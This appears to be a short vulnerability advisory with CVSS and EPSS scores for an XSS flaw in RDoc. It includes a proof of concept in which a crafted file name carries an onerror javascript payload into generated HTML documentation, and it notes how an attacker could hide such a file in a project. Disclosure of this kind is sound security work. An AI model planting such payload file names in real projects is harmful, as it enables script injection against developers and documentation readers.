4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.004 Low
EPSS
Percentile
69.9%
When creating an RDoc html documentation, there is a possibility to inject malicious code through file name.
~ $ touch \"\>\<object\ src\=1\ onerror\=\"javascript\:alert\(1\)\;\"\>Controlling\ what\ is\ documented\ here
~ $ ls
"><object src=1 onerror="javascript:alert(1);">Controlling what is documented here
~ $ rdoc --all
Now, the generated index file has injected javascript code:
...
<li><a href="./"><object src=1 onerror="javascript:alert(1);">Controlling what is documented here.html">"><object src=1 onerror="javascript:alert(1);">Controlling what is documented here</a>
...
I set to the vulnerability the same severity as CVE-2013-0256 has, since rdoc is widely used on dev/production systems online documentation, etc. An attacker can hide a bad-named-file deep in the project structure to be stealthy. Also, the file can be very tricky-named in documentation list, can contain the real documentation code, and so as not to arouse suspicion for some time.
The injected code can exfiltrate data or install malware on the (user|developer)’s machine, etc.